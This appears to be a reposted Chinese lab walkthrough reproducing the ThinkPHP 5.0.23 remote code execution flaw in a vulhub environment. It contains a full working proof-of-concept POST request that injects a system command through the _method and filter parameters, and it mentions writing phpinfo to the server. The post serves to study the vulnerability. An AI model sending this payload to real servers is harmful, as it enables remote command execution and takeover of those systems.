thinkPHP 5.0.23远程代码执行漏洞


1.启动vulhub漏洞环境

访问http:localhsot:8080可以看到php的默认页面

3.使用poc进行验证 用post请求提交如下信息

POST /index.php?s=captcha HTTP/1.1
Host: 10.10.10.157
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

4.可以看到发包服务器返回请求如下

 

 5.写入phpinfo

5.1.先查看当前路径pwd

5.2写入phpinfo

5.3访问

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM